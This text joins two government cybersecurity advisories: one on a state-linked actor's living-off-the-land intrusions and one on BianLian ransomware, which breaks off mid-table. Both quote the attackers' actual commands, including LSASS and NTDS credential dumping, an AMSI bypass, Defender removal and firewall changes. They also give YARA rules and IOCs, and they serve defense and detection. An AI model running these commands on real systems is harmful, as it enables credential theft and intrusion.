Note: Discovery of an entry similar to the example above in the Windows Event Log and/or a file with a name in a similar format may be evidence of malicious activity and should be investigated further. In the event that only a filename is discovered, the epoch timestamp within the filename reflects the time of execution by default and can be used to help scope threat hunting activities.
The following commands were used by the actor to enumerate the network topology [T1016], the active directory structure [T1069.002], and other information about the target environment [T1069.001], [T1082]:
arp -a curl www.ip-api.com dnscmd . /enumrecords /zone {REDACTED} dnscmd . /enumzones dnscmd /enumrecords {REDACTED} . /additional ipconfig /all ldifde.exe -f c:windowstemp<filename>.txt -p subtree net localgroup administrators net group /dom net group "Domain Admins" /dom netsh interface firewall show all netsh interface portproxy show all netsh interface portproxy show v4tov4 netsh firewall show all netsh portproxy show v4tov4 netstat -ano reg query hklmsoftware systeminfo tasklist /v whoami wmic volume list brief wmic service brief wmic product list brief wmic baseboard list full wevtutil qe security /rd:true /f:text /q:*[System[(EventID=4624) and TimeCreated[@SystemTime>='{REDACTED}']] and EventData[Data='{REDACTED}']]
The actor also used the following commands to identify additional opportunities for obtaining credentials in the environment [T1555], [T1003]:
dir C:Users{REDACTED}.sshknown_hosts dir C:users{REDACTED}appdataroamingMozillafirefoxprofiles mimikatz.exe reg query hklmsoftwareOpenSSH reg query hklmsoftwareOpenSSHAgent reg query hklmsoftwarerealvnc reg query hklmsoftwarerealvncvncserver reg query hklmsoftwarerealvncAllusers reg query hklmsoftwarerealvncAllusersvncserver reg query hkcusoftware{REDACTED}puttysession reg save hklmsam ss.dat reg save hklmsystem sy.dat
The actor executed the following additional commands:
7z.exe a -p {REDACTED} c:windowstemp{REDACTED}.7z C:Windowssystem32pcwrun.exe C:UsersAdministratorDesktopWin.exe C:WindowsSystem32cmdbak.exe /c ping -n 1 127.0.0.1 > C:Windowstempputty.log C:WindowsTemptmp.log "cmd.exe" /c dir \127.0.0.1C$ /od "cmd.exe" /c ping –a –n 1 <IP address> "cmd.exe" /c wmic /user:<username> /password:<password> process call create "net stop "<service name>" > C:WindowsTemptmp.log" cmd.exe /Q /c cd 1> \127.0.0.1ADMIN$__<timestamp value> 2 2>&1 net use \127.0.0.1IPC$ /y /d powershell start-process -filepath c:windowstemp<filename>.bat -windowstyle Hidden rar.exe a –{REDACTED} c:Windowstemp{REDACTED} D:{REDACTED} wmic /node:{REDACTED} /user:{REDACTED} /password:{REDACTED} cmd /c whoami xcopy C:windowstemphp d:{REDACTED}
The authoring agencies recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the threat actor’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity Frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
To be able to detect the activity described in this CSA, defenders should set the audit policy for Windows security logs to include “audit process creation” and “include command line in process creation events” in addition to accessing the logs. Otherwise, the default logging configurations may not contain the necessary information.
Enabling these options will create Event ID 4688 entries in the Windows Security log to view command line processes. Given the cost and difficulty of logging and analyzing this kind of activity, if an organization must limit the requirements, they should focus on enabling this kind of logging on systems that are externally facing or perform authentication or authorization, especially including domain controllers.
To hunt for the malicious WMI and PowerShell activity, defenders should also log WMI and PowerShell events. By default, WMI Tracing and deep PowerShell logging are not enabled, but they can be enabled by following the configuration instructions linked in the References section.
The actor takes measures to hide their tracks, such as clearing logs [T1070.001]. To ensure log integrity and availability, defenders should forward log files to a hardened centralized logging server, preferably on a segmented network. Such an architecture makes it harder for an actor to cover their tracks as evidence of their actions will be captured in multiple locations.
Defenders should also monitor logs for Event ID 1102, which is generated when the audit log is cleared. All Event ID 1102 entries should be investigated as logs are generally not cleared and this is a known actor tactic to cover their tracks. Even if an event log is cleared on a host, if the logs are also stored on a logging server, the copy of the log will be preserved.
This activity is often linked to malicious exploitation of edge devices and network management devices. Defenders should enable logging on their edge devices, to include system logs, to be able to identify potential exploitation and lateral movement. They should also enable network-level logging, such as sysmon, webserver, middleware, and network device logs.
File names and directory paths used in these commands are only meant to serve as examples. Actual names and paths may differ depending on environment and activity, so defenders should account for variants when performing queries.
Note: Many of the commands are derivatives of common system administration commands that could generate false positives when used alone without additional indicators.
7z.exe a -p {REDACTED} c:windowstemp{REDACTED}.7z c:windowstemp* "C:pstoolspsexec.exe" \{REDACTED} -s cmd /c "cmd.exe /c "netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=9999"" C:Windowssystem32pcwrun.exe C:UsersAdministratorDesktopWin.exe cmd.exe /C dir /S \{REDACTED}c$Users{REDACTED} >> c:windowstemp{REDACTED}.tmp "cmd.exe" /c wmic process call create "cmd.exe /c mkdir C:windowsTempMcAfee_Logs & ntdsutil "ac i ntds" ifm "create full C:WindowsTempMcAfee_Logs" cmd.exe /Q /c *cd 1> \127.0.0.1ADMIN$__<timestamp value> 2>&1 cmd.exe /Q /c cd 1> \127.0.0.1ADMIN$__1652470932.9400265 2>&1 cmd.exe /Q /c net group "domain admins" /dom 1>\127.0.0.1ADMIN$__<timestamp value> 2>&1 cmd.exe /Q /c wmic process call create "cmd.exe /c mkdir C:WindowsTemptmp & ntdsutil "ac i ntds" ifm "create full C:WindowsTemptmp" 1> \127.0.0.1ADMIN$<timestamp value> 2>&1 D:{REDACTED}xcopy C:windowstemphp d:{REDACTED} Get-EventLog security -instanceid 4624 ldifde.exe -f c:windowstempcisco_up.txt -p subtree makecab ..backup210829-020000.zip ..webappsadssphtmlLock.lic move "\<redacted>c$userspublicAppfileregistrySYSTEM" ..backup210829-020000.zip netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress={REDACTED} connectport=8443 protocol=tcp netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=9999 Rar.exe a –{REDACTED} c:WindowstempDMBC2C61.tmp start-process -filepath c:windowstemp<filename>.bat -windowstyle hidden 1
Note: The batch file in question (<filename>.bat) could use any name, and no discernable pattern has been determined at this time.
wmic process call create "cmd.exe /c mkdir C:userspublicAppfile & ntdsutil "ac i ntds" ifm "create full C:userspublicAppfile" q q wmic process call create "cmd.exe /c mkdir C:WindowsTemptmp & ntdsutil "ac i ntds" ifm "create full C:WindowsTemptmp" wmic process call create "cmd.exe /c ntdsutil "ac i ntds" ifm "create full C:WindowsTempPro" wmic process call create "ntdsutil "ac i ntds" ifm "create full C:WindowsTemp"
Certain patterns in commands (with asterisks for wildcards) can be used to identify potentially malicious commands:
The most common paths where files and executables used by the actor have been found include:
The file names the actor has previously used for such things as malware, scripts, and tools include:
backup.bat |
cl64.exe |
update.bat |
Win.exe |
billagent.exe |
nc.exe |
update.exe |
WmiPrvSE.exe |
billaudit.exe |
rar.exe |
vm3dservice.exe |
WmiPreSV.exe |
cisco_up.exe |
SMSvcService.exe |
watchdogd.exe |
|
In addition to the file names and paths above, malicious files names, believed to be randomly created, in the following format have also been discovered:
C:Windows[a-zA-Z]{8}.exe
f4dd44bc19c19056794d29151a5b1bb76afd502388622e24c863a8494af147dd
ef09b8ff86c276e9b475a6ae6b54f08ed77e09e169f7fc0872eb1d427ee27d31
d6ebde42457fe4b2a927ce53fc36f465f0000da931cfab9b79a36083e914ceca
472ccfb865c81704562ea95870f60c08ef00bcd2ca1d7f09352398c05be5d05d
66a19f7d2547a8a85cee7a62d0b6114fd31afdee090bd43f36b89470238393d7
3c2fe308c0a563e06263bbacf793bbe9b2259d795fcc36b953793a7e499e7f71
41e5181b9553bbe33d91ee204fe1d2ca321ac123f9147bb475c0ed32f9488597
c7fee7a3ffaf0732f42d89c4399cbff219459ae04a81fc6eff7050d53bd69b99
3a9d8bb85fbcfe92bae79d5ab18e4bca9eaf36cea70086e8d1ab85336c83945f
fe95a382b4f879830e2666473d662a24b34fccf34b6b3505ee1b62b32adafa15
ee8df354503a56c62719656fae71b3502acf9f87951c55ffd955feec90a11484
In some cases, the following user-agent string (including the extra spacing) was identified performing reconnaissance activities by this actor:
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0
rule ShellJSP { strings: $s1 = "decrypt(fpath)" $s2 = "decrypt(fcontext)" $s3 = "decrypt(commandEnc)" $s4 = "upload failed!" $s5 = "aes.encrypt(allStr)" $s6 = "newid" condition: filesize < 50KB and 4 of them } |
rule EncryptJSP { strings: $s1 = "AEScrypt" $s2 = "AES/CBC/PKCS5Padding" $s3 = "SecretKeySpec" $s4 = "FileOutputStream" $s5 = "getParameter" $s6 = "new ProcessBuilder" $s7 = "new BufferedReader" $s8 = "readLine()" condition: filesize < 50KB and 6 of them } |
rule CustomFRPClient { meta: description=”Identify instances of the actor's custom FRP tool based on unique strings chosen by the actor and included in the tool” strings: $s1 = "%!PS-Adobe-" nocase ascii wide $s2 = "github.com/fatedier/frp/cmd/frpc" nocase ascii wide $s3 = "github.com/fatedier/frp/cmd/frpc/sub.startService" nocase ascii wide $s4 = "MAGA2024!!!" nocase ascii wide $s5 = "HTTP_PROXYHost: %s" nocase ascii wide condition: all of them } |
rule HACKTOOL_FRPClient { meta: description=”Identify instances of FRP tool (Note: This tool is known to be used by multiple actors, so hits would not necessarily imply activity by the specific actor described in this report)” strings: $s1 = "%!PS-Adobe-" nocase ascii wide $s2 = "github.com/fatedier/frp/cmd/frpc" nocase ascii wide $s3 = "github.com/fatedier/frp/cmd/frpc/sub.startService" nocase ascii wide $s4 = "HTTP_PROXYHost: %s" nocase ascii wide condition: 3 of them } |
Active Directory and domain controller hardening:
CISA regional cyber threats:
Microsoft Threat Intelligence blog:
Ntdsutil.exe:
PowerShell:
Windows command line process auditing:
Windows Defender Firewall:
Windows management instrumentation:
Windows password spraying:
The NSA Cybersecurity Collaboration Center, along with the authoring agencies, acknowledge Amazon Web Services (AWS) Security, Broadcom, Cisco Talos, Google's Threat Analysis Group, Lumen Technologies, Mandiant, Microsoft Threat Intelligence (MSTI), Palo Alto Networks, SecureWorks, SentinelOne, Trellix, and additional industry partners for their collaboration on this advisory.
The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise does not constitute or imply its endorsement, recommendation, or favoring by the authoring agencies' governments, and this guidance shall not be used for advertising or product endorsement purposes.
Active Directory®, Microsoft®, PowerShell®, and Windows® are registered trademarks of Microsoft Corporation. MITRE® and ATT&CK® are registered trademarks of The MITRE Corporation.
This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
U.S. organizations: Urgently report any anomalous activity or incidents, including based upon technical information associated with this Cybersecurity Advisory, to CISA at Report@cisa.dhs.gov or cisa.gov/report or to the FBI via your local FBI field office listed at https://www.fbi.gov/contact-us/field-offices.
NSA Cybersecurity Report Questions and Feedback: CybersecurityReports@nsa.gov
NSA Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov
NSA Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov
Australian organizations: Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and to access alerts and advisories.
Canadian organizations: Report incidents by emailing CCCS at contact@cyber.gc.ca.
New Zealand organizations: Report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654.
United Kingdom organizations: Report a significant cyber security incident at ncsc.gov.uk/report-an-incident (monitored 24 hours) or, for urgent assistance, call 03000 200 973.
Table 2 captures all referenced threat actor tactics and techniques in this advisory.
Initial Access |
||
---|---|---|
Technique Title |
ID |
Use |
Exploit Public-facing Application |
Actor used public-facing applications to gain initial access to systems; in this case, Earthworm and PortProxy. |
|
Execution |
||
Windows Management Instrumentation |
The actor executed WMIC commands to create a copy of the SYSTEM registry. |
|
Command and Scripting Interpreter: PowerShell |
The actor used a PowerShell command to identify successful logons to the host. |
|
Command and Scripting Interpreter: Windows Command Shell |
The actor used this primary command prompt to execute a query that collected information about the storage devices on the local host. |
|
Persistence |
||
Server Software Component: Web Shell |
The actor used backdoor web servers with web shells to establish persistence to systems, including some of the webshells being derived from Awen webshell. |
|
Defense Evasion |
||
Hide Artifacts |
The actor selectively cleared Windows Event Logs, system logs, and other technical artifacts to remove evidence of their intrusion activity. |
|
Indicator Removal: Clear Windows Event Logs |
The actor cleared system event logs to hide activity of an intrusion. |
|
Credential Access |
||
OS Credential Dumping: NTDS |
The actor may try to exfiltrate the ntds.dit file and the SYSTEM registry hive out of the network to perform password cracking. |
|
Brute Force |
The actor attempted to gain access to accounts with multiple password attempts. |
|
Brute Force: Password Spraying |
|
The actor used commonly used passwords against accounts to attempt to acquire valid credentials. |
OS Credential Dumping |
The actor used additional commands to obtain credentials in the environment. |
|
Credentials from Password Stores |
The actors searched for common password storage locations. |
|
Discovery |
||
System Information Discovery |
The actors executed commands to gather information about local drives. |
|
System Owner/User Discovery |
The actors gathered information about successful logons to the host using a PowerShell command. |
|
Permission Groups Discovery: Local Groups |
The actors attempt to find local system groups and permission settings. |
|
Permission Groups Discovery: Doman Groups |
The actors used commands to enumerate the active directory structure. |
|
System Network Configuration Discovery |
The actors used commands to enumerate the network topology. |
|
Command and Control |
||
Proxy |
The actors used commands to enable port forwarding on the host. |
|
Proxy: External Proxy |
The actors used compromised SOHO devices (e.g. routers) to obfuscate the source of their activity. |
]]>
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Cyber Security Centre (ACSC) are releasing this joint Cybersecurity Advisory to disseminate known BianLian ransomware and data extortion group IOCs and TTPs identified through FBI and ACSC investigations as of March 2023.
Actions to take today to mitigate cyber threats from BianLian ransomware and data extortion: |
BianLian is a ransomware developer, deployer, and data extortion cybercriminal group that has targeted organizations in multiple U.S. critical infrastructure sectors since June 2022. They have also targeted Australian critical infrastructure sectors in addition to professional services and property development. The group gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian group actors then extort money by threatening to release data if payment is not made. BianLian group originally employed a double-extortion model in which they encrypted victims’ systems after exfiltrating the data; however, around January 2023, they shifted to primarily exfiltration-based extortion.
FBI, CISA, and ACSC encourage critical infrastructure organizations and small- and medium-sized organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of BianLian and other ransomware incidents.
Download the PDF version of this report (710kb):
For a downloadable copy of IOCs (35kb), see:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See the MITRE ATT&CK® Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® Tactics and Techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
BianLian is a ransomware developer, deployer, and data extortion cybercriminal group. FBI observed BianLian group targeting organizations in multiple U.S. critical infrastructure sectors since June 2022. In Australia, ACSC has observed BianLian group predominately targeting private enterprises, including one critical infrastructure organization. BianLian group originally employed a double-extortion model in which they exfiltrated financial, client, business, technical, and personal files for leverage and encrypted victims’ systems. In 2023, FBI observed BianLian shift to primarily exfiltration-based extortion with victims’ systems left intact, and ACSC observed BianLian shift exclusively to exfiltration-based extortion. BianLian actors warn of financial, business, and legal ramifications if payment is not made.
BianLian group actors gain initial access to networks by leveraging compromised Remote Desktop Protocol (RDP) credentials likely acquired from initial access brokers [T1078],[T1133] or via phishing [T1566].
BianLian group actors implant a custom backdoor specific to each victim written in Go (see the Indicators of Compromise Section for an example) [T1587.001] and install remote management and access software—e.g., TeamViewer, Atera Agent, SplashTop, AnyDesk—for persistence and command and control [T1105],[T1219].
FBI also observed BianLian group actors create and/or activate local administrator accounts [T1136.001] and change those account passwords [T1098].
BianLian group actors use PowerShell [T1059.001] and Windows Command Shell [T1059.003] to disable antivirus tools [T1562.001], specifically Windows defender and Anti-Malware Scan Interface (AMSI). BianLian actors modify the Windows Registry [T1112] to disable tamper protection for Sophos SAVEnabled, SEDEenabled, and SAVService services, which enables them to uninstall these services. See Appendix: Windows PowerShell and Command Shell Activity for additional information, including specific commands they have used.
BianLian group actors use a combination of compiled tools, which they first download to the victim environment, to learn about the victim’s environment. BianLian group actors have used:
BianLian actors also use native Windows tools and Windows Command Shell to:
See Appendix: Windows PowerShell and Command Shell Activity for additional information, including specific commands they have used.
BianLian group uses valid accounts for lateral movement through the network and to pursue other follow-on activity. To obtain the credentials, BianLian group actors use Windows Command Shell to find unsecured credentials on the local machine [T1552.001]. FBI also observed BianLian harvest credentials from the Local Security Authority Subsystem Service (LSASS) memory [T1003.001], download RDP Recognizer (a tool that could be used to brute force RDP passwords or check for RDP vulnerabilities) to the victim system, and attempt to access an Active Directory domain database (NTDS.dit) [T1003.003].
In one case, FBI observed BianLian actors use a portable executable version of an Impacket tool (secretsdump.py) to move laterally to a domain controller and harvest credential hashes from it. Note: Impacket is a Python toolkit for programmatically constructing and manipulating network protocols. Through the Command Shell, an Impacket user with credentials can run commands on a remote device using the Windows management protocols required to support an enterprise network. Threat actors can run portable executable files on victim systems using local user rights, assuming the executable is not blocked by an application allowlist or antivirus solution.
See Appendix: Windows PowerShell and Command Shell Activity for additional information.
BianLian group actors use PsExec and RDP with valid accounts for lateral movement [T1021.001]. Prior to using RDP, BianLian actors used Command Shell and native Windows tools to add user accounts to the local Remote Desktop Users group, modified the added account’s password, and modified Windows firewall rules to allow incoming RDP traffic [T1562.004]. See Appendix: Windows PowerShell and Command Shell Activity for additional information.
In one case, FBI found a forensic artifact (exp.exe) on a compromised system that likely exploits the Netlogon vulnerability (CVE-2020-1472) and connects to a domain controller.
FBI observed BianLian group actors using malware (system.exe) that enumerates registry [T1012] and files [T1083] and copies clipboard data from users [T1115].
BianLian group actors search for sensitive files using PowerShell scripts (See Appendix: Windows PowerShell and Command Shell Activity) and exfiltrate them for data extortion. Prior to January 2023, BianLian actors encrypted files [T1486] after exfiltration for double extortion.
BianLian group uses File Transfer Protocol (FTP) [T1048] and Rclone, a tool used to sync files to cloud storage, to exfiltrate data [T1537]. FBI observed BianLian group actors install Rclone and other files in generic and typically unchecked folders such as programdatavmware and music folders. ACSC observed BianLian group actors use Mega file-sharing service to exfiltrate victim data [T1567.002].
BianLian’s encryptor (encryptor.exe) modified all encrypted files to have the .bianlian extension. The encryptor created a ransom note, Look at this instruction.txt, in each affected directory (see Figure 1 for an example ransom note.) According to the ransom note, BianLian group specifically looked for, encrypted, and exfiltrated financial, client, business, technical, and personal files.
If a victim refuses to pay the ransom demand, BianLian group threatens to publish exfiltrated data to a leak site maintained on the Tor network. The ransom note provides the Tox ID A4B3B0845DA242A64BF17E0DB4278EDF85855739667D3E2AE8B89D5439015F07E81D12D767FC, which does not vary across victims. The Tox ID directs the victim organization to a Tox chat via https://qtox.github[.]io and includes an alternative contact email address (swikipedia@onionmail[.]org or xxx@mail2tor[.]com). The email address is also the same address listed on the group’s Tor site under the contact information section. Each victim company is assigned a unique identifier included in the ransom note. BianLian group receives payments in unique cryptocurrency wallets for each victim company.
BianLian group engages in additional techniques to pressure the victim into paying the ransom; for example, printing the ransom note to printers on the compromised network. Employees of victim companies also reported receiving threatening telephone calls from individuals associated with BianLian group.
See Table 1 for IOCs obtained from FBI investigations as of March 2023.
Name |
SHA-256 Hash |
Description |
7b15f570a23a5c5ce8ff942da60834a9d0549ea3ea9f34f900a09331325df893 |
Malware associated with BianLian intrusions, which is an example of a possible backdoor developed by BianLian group. |
|
1fd07b8d1728e416f897bef4f1471126f9b18ef108eb952f4b75050da22e8e43 |
Example of a BianLian encryptor. |
|
0c1eb11de3a533689267ba075e49d93d55308525c04d6aff0d2c54d1f52f5500 |
Possible NetLogon vulnerability (CVE-2020-1472) exploitation. |
|
40126ae71b857dd22db39611c25d3d5dd0e60316b72830e930fba9baf23973ce |
Enumerates registry and files. Reads clipboard data. |
See Table 2 for all referenced threat actor tactics and techniques in this advisory.
Technique Title |
ID |
Use |
---|---|---|
Resource Development |
||
Develop Capabilities: Malware |
BianLian group actors developed a custom backdoor used in their intrusions. |
|
Initial Access |
||
External Remote Services |
BianLian group actors used RDP with valid accounts as a means of gaining initial access and for lateral movement. |
|
Phishing |
BianLian group actors used phishing to obtain valid user credentials for initial access. |
|
Valid Accounts |
BianLian group actors used RDP with valid accounts as a means of gaining initial access and for lateral movement. |
|
Execution |
||
Command and Scripting Interpreter: PowerShell |
BianLian group actors used PowerShell to disable AMSI on Windows. See Appendix: Windows PowerShell and Command Shell Activity for additional information. |
|
Command and Scripting Interpreter: Windows Command Shell |
BianLian group actors used Windows Command Shell to disable antivirus tools, for discovery, and to execute their tools on victim networks. See Appendix: Windows PowerShell and Command Shell Activity for additional information. |
|
Scheduled Task/Job: Scheduled Task |
BianLian group actors used a Scheduled Task run as SYSTEM (the highest privilege Windows accounts) to execute a Dynamic Link Library (DLL) file daily. See Appendix: Windows PowerShell and Command Shell Activity for additional information. |
|
Persistence |
||
Account Manipulation |
BianLian group actors changed the password of an account they created. BianLian actors modified the password of an account they added to the local Remote Desktop Users group. |
|
Create Account: Local Account |
BianLian group actors created/activated a local administrator account. BianLian group actors used net.exe to add a user account to the local Remote Desktop Users group. (See Appendix: Windows PowerShell and Command Shell Activity for more information.) |
|
Defense Evasion |
||
Modify Registry |
BianLian group actors modified the registry to disable user authentication for RDP connections, allow a user to receive help from Remote Assistance, and disable tamper protection for Sophos SAVEnabled, SEDEenabled, and SAVService services, which enables them to uninstall these services. |
|
Impair Defenses: Disable or Modify Tools |
BianLian group actors disabled Windows defender, AMSI, and Sophos SAVEnabled and SEDEenabled tamper protection services. See Appendix: Windows PowerShell and Command Shell Activity for additional information. |
|
Impair Defenses: Disable or Modify System Firewall |
BianLian group actors added modified firewalls to allow RDP traffic by adding new rules to the Windows firewall that allow incoming RDP traffic and enable a pre-existing Windows firewall rule group named Remote Desktop. |
|
Credential Access |
||
OS Credential Dumping: LSASS Memory |
BianLian group actors accessed credential material stored in the process memory of the LSASS. See Appendix: Windows PowerShell and Command Shell Activity for additional information. |
|
OS Credential Dumping: NTDS |
BianLian group actors attempted to access or create a copy of the Active Directory domain database in order to steal credential information and to obtain other information about domain members such as devices, users, and access rights. |
|
Unsecured Credentials: Credentials In Files |
BianLian group actors searched local file systems and remote file shares for files containing insecurely stored credentials. |
|
Discovery |
||
Account Discovery: Domain Account |
BianLian group actors queried the domain controller to identify accounts in the Domain Admins and Domain Computers groups. This information can help adversaries determine which domain accounts exist to aid in follow-on activity. |
|
Domain Trust Discovery |
BianLian group actors used PingCastle to enumerate the AD and map trust relationships. BianLian group actors retrieved a list of domain trust relationships used to identify lateral movement opportunities in Windows multi-domain/forest environments. |
|
File and Directory Discovery |
BianLian group used malware (system.exe) that enumerates files. |
|
Network Service Discovery |
BianLian actors used Advanced Port Scanner and SoftPerfect Network Scanner to ping computers, scan ports, and identify program versions running on ports. |
|
Network Share Discovery |
BianLian actors used SoftPerfect Network Scanner, which can discover shared folders. BianLian group actors used SharpShares to enumerate accessible network shares in a domain. |
|
Permission Groups Discovery: Domain Groups |
BianLian group actors queried the domain controller to identify groups. |
|
Query Registry |
BianLian group used malware (system.exe) that enumerates registry. |
|
Remote System Discovery |
BianLian group actors attempted to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for lateral movement. BianLian group actors retrieved a list of domain controllers. |
|
System Owner User Discovery |
BianLian group actors queried currently logged-in users on a machine. |
|
Lateral Movement |
||
Remote Services: Remote Desktop Protocol |
BianLian group actors used RDP with valid accounts for lateral movement. |
|
Collection |
||
Clipboard Data |
BianLian group actors’ malware collects data stored in the clipboard from users copying information within or between applications. |
|
Command and Control |
||
Ingress Tool Transfer |
BianLian group actors transferred tools or other files from an external system into a compromised environment. |
|
Remote Access Software |
BianLian group actors used legitimate desktop support and remote access software, such as TeamViewer, Atera, and SplashTop, to establish an interactive command and control channel to target systems within networks. |
|
Exfiltration |
||
Transfer Data to Cloud Account |
BianLian group actors used Rclone to exfiltrate data to a cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection. |
|
Exfiltration Over Alternative Protocol |
BianLian group actors exfiltrated data via FTP. |
|
Exfiltration Over Web Service: Exfiltration to Cloud Storage |
BianLian group actors exfiltrated data via Mega public file-sharing service. |
|
Impact |
||
Data Encrypted for Impact |
BianLian group actors encrypted data on target systems. |
FBI, CISA, and ACSC recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
See NSA Cybersecurity Information sheet Enforce Signed Software Execution Policies for additional guidance.
In addition, FBI, CISA, and ACSC recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:
In addition to applying mitigations, FBI, CISA, and ACSC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI, CISA, and ACSC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
FBI, CISA, and ACSC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The FBI is seeking any information that can be shared, including boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with BianLian actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at cisa.gov/report. Australian organizations that have been impacted or require assistance in regard to a ransomware incident can contact ACSC via 1300 CYBER1 (1300 292 371) or by submitting a report cyber.gov.au.
Microsoft and Sophos contributed to this advisory.
Through FBI investigations as of March 2023, FBI has observed BianLian actors use the commands in Table 3. ACSC has observed BianLian actors use some of the same commands.
Command |
Use |
[Ref].Assembly.GetType(‘System.Management.Automation.AmsiUtils’).GetField(‘amsiInitFailed’,’NonPublic,* Static’).SetValue($null,$true) |
Disables the AMSI on Windows. AMSI is a built-in feature on Windows 10 and newer that provides an interface for anti-malware scanners to inspect scripts prior to execution. When AMSI is disabled, malicious scripts may bypass antivirus solutions and execute undetected. |
cmd.exe /Q /c for /f “tokens=1,2 delims= “ ^%A in (‘”tasklist /fi “Imagename eq lsass.exe” | find “lsass””’) do rundll32.exe C:windowsSystem32comsvcs.dll, MiniDump ^%B WindowsTemp<file>.csv full |
Creates a memory dump lsass.exe process and saves it as a CSV filehttps://attack.mitre.org/versions/v12/techniques/T1003/001/. BianLian actors used it to harvest credentials from lsass.exe. |
cmd.exe /Q /c net user <admin> /active:yes 1> \127.0.0.1C$WindowsTemp<folder> 2>&1 |
Activates the local Administrator account. |
cmd.exe /Q /c net user "<admin>"<password> 1> \127.0.0.1C$WindowsTemp<folder> 2>&1 |
Changes the password of the newly activated local Administrator account. |
cmd.exe /Q /c quser 1> \127.0.0.1C$WindowsTemp<folder> 2>&1 |
Executes quser.exe to query the currently logged-in users on a machine. The command is provided arguments to run quietly and exit upon completion, and the output is directed to the WindowsTemp directory. |
dism.exe /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart |
Using the Deployment Image Servicing and Management (DISM) executable file, removes the Windows Defender feature. |
dump.exe -no-pass -just-dc user.local/<fileserver.local>@<local_ip> |
Executes secretsdump.py, a Portable Executable version of an Impacket tool. Used to dump password hashes from domain controllers. |
exp.exe -n <fileserver.local> -t <local_ip> |
Possibly attempted exploitation of the NetLogon vulnerability (CVE-2020-1472). |
findstr /spin "password" *.* >C:UserstrainingMusic<file>.txt |
Searches for the string password in all files in the current directory and its subdirectories and puts the output to a file. |
ldap.exe -u user<user> -p <password> ldap://<local_ip> |
Connects to the organization’s Lightweight Directory Access Protocol (LDAP) server. |
logoff |
Logs off the current user from a Windows session. Can be used to log off multiple users at once. |
mstsc |
Launches Microsoft Remote Desktop Connection client application in Windows. |
net group /domain |
Retrieves a list of all groups from the domain controller. |
net group 'Domain Admins' /domain |
Queries the domain controller to retrieve a list of all accounts from Domain Admins group. |
net group 'Domain Computers' /domain |
Queries the domain controller to retrieve a list of all accounts from Domain Computers group. |
net user /domain |
Queries the domain controller to retrieve a list of all users in the domain. |
net.exe localgroup "Remote Desktop Users" <user> /add |
Adds a user account to the local Remote Desktop Users group. |
net.exe user <admin> <password> /domain |
Modifies the password for the specified account. |
netsh.exe advfirewall firewall add rule "name=allow RemoteDesktop" dir=in * protocol=TCP localport=<port num> action=allow |
Adds a new rule to the Windows firewall that allows incoming RDP traffic. |
netsh.exe advfirewall firewall set rule "group=remote desktop" new enable=Yes |
Enables the pre-existing Windows firewall rule group named Remote Desktop. This rule group allows incoming RDP traffic. |
nltest /dclist |
Retrieves a list of domain controllers. |
nltest /domain_trusts |
